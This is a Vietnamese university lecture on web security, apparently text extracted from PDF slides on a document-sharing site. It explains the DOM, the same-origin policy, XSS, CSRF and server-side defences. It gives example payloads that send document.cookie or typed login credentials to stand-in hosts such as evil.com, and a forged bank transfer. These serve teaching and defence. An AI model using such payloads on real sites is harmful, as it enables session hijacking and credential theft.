intTypePromotion=1
ADSENSE

Bài giảng An ninh mạng: Bài 7 - Bùi Trọng Tùng

Chia sẻ: _ _ | Ngày: | Loại File: PDF | Số trang:20

15
lượt xem
2
download
 
  Download Vui lòng tải xuống để xem tài liệu đầy đủ

Bài giảng An ninh mạng - Bài 7: An toàn dịch vụ web - XSS & CSRF. Sau khi học xong chương này, người học có thể hiểu được một số kiến thức cơ bản về: Hiển trị (rendering) nội dung trang web, Document Object Model (DOM), chính sách cùng nguồn (SOP), tấn công dạng Cross Site Scripting (XSS), tấn công dạng cross site request forgery.

Chủ đề:
Lưu

Nội dung Text: Bài giảng An ninh mạng: Bài 7 - Bùi Trọng Tùng

  1. BÀI 7. AN TOÀN DỊCH VỤ WEB XSS & CSRF Bùi Trọng Tùng, Viện Công nghệ thông tin và Truyền thông, Đại học Bách khoa Hà Nội 1 Nội dung • Xử lý trang web tại trình duyệt • XSS • CSRF 2 CuuDuongThanCong.com https://fb.com/tailieudientucntt 1
  2. 1. XỬ LÝ TẠI TRÌNH DUYỆT Bùi Trọng Tùng, Viện Công nghệ thông tin và Truyền thông, Đại học Bách khoa Hà Nội 3 Tương tác trình duyệt Web-Web server HTTP Request(GET, POST, HEAD, PUT…) HTTP Response(HTML Page, JS file, CSS file, image, ...) Hiển thị Database Queries 4 CuuDuongThanCong.com https://fb.com/tailieudientucntt 2
  3. Hiển trị (rendering) nội dung trang web • Mô hình xử lý cơ bản tại trình duyệt: mỗi cửa sổ hoặc 1 frame:  Nhận thông điệp HTTP Response  Hiển thị:  Xử lý mã HTML, CSS, Javascripts  Gửi thông điệp HTTP Request yêu cầu các đối tượng khác(nếu có)  Bắt và xử lý sự kiện • Các sự kiện có thể xảy ra:  Sự kiện của người dùng: OnClick, OnMouseOver…  Sự kiện khi hiển thị: OnLoad, OnBeforeUnload…  Theo thời gian: setTimeout(), clearTimeout()… 5 Ví dụ My First Web Page My first paragraph. Try it 6 CuuDuongThanCong.com https://fb.com/tailieudientucntt 3
  4. Document Object Model(DOM) • Tổ chức các đối tượng của trang HTML thành cấu trúc cây • Cung cấp API (hướng đối tượng)để tương tác • Ví dụ:  Thuộc tính: document.alinkColor, document.URL, document.forms[ ], document.links[ ]…  Phương thức: document.write()… • Bao gồm cả đối tượng của trình duyệt(Browser Object Model - BOM): window, document, frames[], history, location… 7 DOM – Ví dụ Example ... Alice document head body title ... a Alice 8 CuuDuongThanCong.com https://fb.com/tailieudientucntt 4
  5. DOM – Ví dụ khác ... flip = 0; function flipText() { var x = document.getElementById('myid').firstChild; if(flip == 0) { x.nodeValue = 'Bob'; flip = 1;} else { x.nodeValue = 'Alice'; flip = 0; } } document Alice script a flipText Alice 9 Javascript • Ngôn ngữ cho phép xây dựng các script để trình duyệt thực thi • Được nhúng vào các trang web mà server trả về cho client • Thường sử dụng để tương tác với DOM • Khả năng tương tác rất mạnh:  Thay đổi nội dung trang web  Theo dõi các sự kiện trên trang web (bao gồm cả hành vi của người dùng: rê chuột, nhấp chuột, gõ phím)  Đọc, thiết lập cookie  Sinh các HTTP Request khác và đọc HTTP Response trả về 10 CuuDuongThanCong.com https://fb.com/tailieudientucntt 5
  6. Chính sách cùng nguồn(SOP) • Same Origin Policy • Chính sách sử dụng trên trình duyệt Web • Nguồn = Giao thức + Hostname + Cổng ứng dụng • Chính sách SOP: Trang web của nguồn này không được phép đọc, thay đổi nội dung trang web của nguồn khác  cách ly các trang web khác nguồn A B A A B 11 SOP – Ví dụ Kiểm tra khả năng truy cập từ http://www.example.com/dir/page.html Compared URL Outcome httpː//www.example.com/dir/page2.html Success httpː//www.example.com/dir2/other.html Success httpː//username:password@www.example.com/dir2/other.html Success httpː//www.example.com:81/dir/other.html Failure https://www.example.com/dir/other.html Failure http://en.example.com/dir/other.html Failure http://example.com/dir/other.html Failure http://v2.www.example.com/dir/other.html Failure httpː//www.example.com:80/dir/other.html Depends 12 CuuDuongThanCong.com https://fb.com/tailieudientucntt 6
  7. 2. TẤN CÔNG DẠNG CROSS SITE SCRIPTING (XSS) Bùi Trọng Tùng, Viện Công nghệ thông tin và Truyền thông, Đại học Bách khoa Hà Nội 13 Tấn công XSS (Cross Site Scripting) • Lỗ hổng XSS: ứng dụng web không kiểm soát sự có mặt của mã thực thi trong giá trị tham số đầu vào và/hoặc trong kết quả trả về trên thông điệp HTTP Response • Tấn công XSS: lợi dụng lỗ hổng XSS để ẩn giấu mã độc trong thông điệp HTTP Request và lừa ứng dụng web trả về thông điệp HTTP Response chứa mã độc này. • Hậu quả: trình duyệt của người dùng thông thường thực thi mã độc nằm trong thông điệp HTTP Response nhận được từ web server • Có thể thực hiện tương tự trên các dịch vụ email, trình đọc file PDF • Các phương phép chèn mã thực thi:  Reflected XSS  Stored XSS  DOM-based XSS 14 CuuDuongThanCong.com https://fb.com/tailieudientucntt 7
  8. Tấn công Reflected XSS Attack Server Victim Server evil.com (5) Trình Victim Server duyệt thực thi mã độc victim.com 15 Tấn công Reflected XSS - Ví dụ • Giả sử trên website của mục tiêu cung cấp tính năng tìm kiếm. http://victim.com/search.php?term= • Đoạn mã thực thi trên server như sau: Search Results Results for : . . . 16 CuuDuongThanCong.com https://fb.com/tailieudientucntt 8
  9. Tấn công Reflected XSS - Ví dụ (tiếp) • Người dùng tải một trang web từ server của kẻ tấn công chưa đường dẫn sau http://victim.com/search.php?term= document.location=‘http://evil.com/’+ document.cookie) • Điều gì xảy ra khi người dùng nhấp vào đường dẫn trên? 17 http://www.victim.com/search.php? term=%3Cscript%3Edocument.location=‘evil. com/’ +document.cookie;%3C/script%3E “Check out this link!” http://www.victi Session token của người dùng trên m.com/search.ph p? victim.com term=%3Cscript %3Edocument.loc evil.com/f9geiv33knv141 ation=‘evil.com/’ +document.cookie HTTP ;%3C/script%3E Response chứa mã thực thi đã truyền qua giá trị victim.com evil.com đầu vào 18 CuuDuongThanCong.com https://fb.com/tailieudientucntt 9
  10. Tấn công Stored XSS Attack Browser/Server evil.com (1)Chèn mã độc vào CSDL của mục tiêu (4)Trình duyệt thực thi mã độc bank.com 19 Session token của người evil.com dùng trên victim.com evil.com/f9geiv33knv141 Comment with text: document.location = “evil.com/” + Posts comment with text: document.cookie document.location = “evil.com/” + document.cookie victim.com 20 CuuDuongThanCong.com https://fb.com/tailieudientucntt 10
  11. Tấn công Stored XSS – Ví dụ • Tấn công vào myspace.com năm 2007 để phát tán sâu Samy • Myspace cho phép người dùng đăng bài dưới dạng mã HTML:  Kiểm soát, không cho phép nhúng Javascript vào các thẻ , , onclick,  Nhưng không kiểm soát việc nhúng vào thẻ CSS:  Hoặc ẩn từ khóa “javascript” thành “java\nscript” • Khi sâu Samy được thực thi, tài khoản người dùng tự động kết bạn với tài khoản có tên Samy  Trong 24 giờ, Samy có hàng triệu bạn bè 21 Tấn công DOM-based XSS • Lỗ hổng: trình duyệt được phép thực thi script được nhúng trong đối tượng DOM của trang web đang hiển thị • Không thể phát hiện được tại server 22 CuuDuongThanCong.com https://fb.com/tailieudientucntt 11
  12. DOM-based XSS - Ví dụ • Trang có lỗ hổng Welcome! Hi var pos = document.URL.indexOf("name=") + 5; document.write(document.URL.substring(pos,document.URL.l ength)); • Yêu cầu thông thường http://www.example.com/welcome.html?name=Joe • Nhúng mã thực thi http://www.example.com/welcome.html?name= alert(document.cookie) 23 Phòng chống tấn công XSS phía server • Open Web Application Security Project (OWASP) • Kiểm tra cẩn thận HTTP header, cookie, truy vấn, các trường ẩn • Không nên cố gắng nhận dạng, loại trừ, lọc các đối tượng chủ động (active content) • Nên sử dụng các chính sách dạng “positive” liệt kê những đối tượng, hành vi được phép, thay vì các chính sách dạng “negative” • Kiểm tra giá trị đầu vào do client cung cấp • Từ chối/sử dụng các bộ mã cho các ký tự đặc biệt với chuỗi đầu ra. Ví dụ dùng &lt cho ‘’, &quot cho “... 24 CuuDuongThanCong.com https://fb.com/tailieudientucntt 12
  13. Chú ý: Mã Javascript có thể chèn vào nhiều vị trí khác nhau trên trang web • Sử dụng mã Javascript như một URI • Chèn mã Javascript vào các thuộc tính của phương thức xử lý sự kiện (OnSubmit, OnError, OnLoad, …) • Một số ví dụ:    action="logon.jsp" method="post" onsubmit="hackImg=new Image; hackImg.src='http://www.digicrime.com/'+document.for ms(1).login.value'+':'+ document.forms(1).password.value;" 25 Phòng chống XSS phía server • Sử dụng bộ lọc chuỗi giá trị đầu ra để loại các ký tự nhạy cảm: Hãy cẩn thận với các mẹo vượt qua bộ lọc Hãy lọc nhiều lần cho tới khi loại hết các từ khóa Ví dụ: lọc 1 lần chuỗi
  14. Phòng chống tấn công XSS phía server • https://www.owasp.org/index.php/XSS_Filter_Evasion_Ch eat_Sheet • https://www.owasp.org/index.php/XSS_(Cross_Site_Scrip ting)_Prevention_Cheat_Sheet • https://www.owasp.org/index.php/DOM_based_XSS_Prev ention_Cheat_Sheet 27 3. TẤN CÔNG DẠNG CROSS SITE REQUEST FORGERY Bùi Trọng Tùng, Viện Công nghệ thông tin và Truyền thông, Đại học Bách khoa Hà Nội 28 CuuDuongThanCong.com https://fb.com/tailieudientucntt 14
  15. Tấn công CSRF • Lợi dụng hiệu ứng bên (side effect) để tạo ra các HTTP Request giả mạo.  Hiệu ứng bên (side effect): trong quá trình hiển thị (render) trang web, trình duyệt có thể tự động truy cập đến tài nguyên những liên kết khác mà không được kiểm soát. Ví dụ: • Thường kết hợp khai thác các lỗ hổng không kiểm soát việc lưu giữ và truy cập cookie trên trình duyệt • Lưu ý: tấn công CSRF khác tấn công XSS 29 Tấn công CSRF – Ví dụ • Người dùng đăng nhập trên website bank.com và thực hiện một giao dịch chuyển tiền  Trình duyệt lưu cookie của phiên làm việc(gồm các thông tin người dùng đã xác thực với ngân hàng) • Người dùng truy cập vào một trang web chứa đoạn mã độc(Ví dụ attacker.com): … document.F.submit(); • Khi hiển thị trang web, trình duyệt tạo một HTTP Request với cookie ở trên để thực thi giao dịch chuyển tiền cho attacker 30 CuuDuongThanCong.com https://fb.com/tailieudientucntt 15
  16. Tấn công CSRF – Ví dụ Xác thực với bank.com bank.com /transfer?amount=500&dest=Bob evil.com Kiểm tra session token Chuyển $500 tới Bob 31 Tấn công CSRF – Ví dụ /transfer?amount=10000&dest=evilcorp bank.com evil.com $10000 Kiểm tra session token Gửi $10000 tới EvilCorp 32 CuuDuongThanCong.com https://fb.com/tailieudientucntt 16
  17. Tấn công CSRF – Ví dụ • “Drive-By Pharming”, Sid Stamm, Zulfikar Ramzan, Markus Jakobsson, ICICS'07 • Các thiết bị router phục vụ cho gia đình/văn phòng nhỏ cho phép cấu hình qua giao diện Web  Người dùng cần đăng nhập. Tuy nhiên hầu hết dùng tài khoản mặc định của nhà sản xuất • Tấn công Drive-by Pharming:  Người dùng truy cập vào website chứa mã độc  Một Javascript quét và tìm địa chỉ router  Sử dụng Javascript để phát hiện hãng sản xuất và tên sản phẩm (thường thể hiện qua logo)  Login và sửa thông số cấu hình qua phương thức GET trên URL 33 Phòng chống tấn công CSRF phía server • Kiểm tra nguồn sinh request qua trường Referer trong tiêu đề thông điệp HTTP. Referer: http://evilsite.com/testpage.html  Hạn chế: lộ thông tin thói quen của người dùng • Khắc phục: Sử dụng trường Origin Origin: http://evilsite.com • Sử dụng XMLHttpRequest API  Phương thức setRequestHeader cho phép thêm 1 trường bất kỳ trong tiêu đề HTTP Request  Ví dụ: thư viện prototype.js của JavaScript sử dụng X- Requested-By • Sử dụng xác thực đa yếu tố, capcha, secret token… 34 CuuDuongThanCong.com https://fb.com/tailieudientucntt 17
  18. Phòng chống tấn công CSRF phía server • https://www.owasp.org/index.php/Cross- Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet • https://www.owasp.org/index.php/Reviewing_code_for_Cr oss-Site_Request_Forgery_issues 35 Tổng kết • Command Injection:  Chèn mã độc vào giá trị đầu vào để thực thi trên server • SQL Injection:  Chèn truy vấn SQL vào giá trị đầu vào để truy cập CSDL trái phép trên server • CSRF:  Lợi dụng hiệu ứng bên (site effect) để gửi các HTTP Request độc hại từ trình duyệt của người dùng • XSS  Chèn mã độc vào giá trị đầu vào và lợi dụng kết quả server trả về để thực thi trên client 36 CuuDuongThanCong.com https://fb.com/tailieudientucntt 18
  19. Một số biện pháp phòng chống trên web server • Kiểm tra cẩn thận HTTP header, cookie, thẻ bài • Kiểm tra cẩn thận giá trị đầu vào, kết quả trả về • Sử dụng các công cụ kiểm thử black box • Sử dụng các công cụ quét mã độc: Google Analytic, Norton Safe Web... • Theo dõi và cập nhật đầy đủ các bản vá bảo mật • Sử dụng firewall dịch vụ web: Apache Mod Security, Imperva SecureSphere Web Application Firewall, Check Point Web Security… 37 Người dùng được bảo vệ như thế nào? 38 CuuDuongThanCong.com https://fb.com/tailieudientucntt 19
  20. Bài giảng sử dụng một số hình vẽ và ví dụ từ các bài giảng: • Computer and Network Security, Stanford University • Computer Security, Berkeley University • Introduction to Computer Security, Carnegie Mellon University 39 CuuDuongThanCong.com https://fb.com/tailieudientucntt 20
ADSENSE

CÓ THỂ BẠN MUỐN DOWNLOAD

 

Đồng bộ tài khoản
2=>2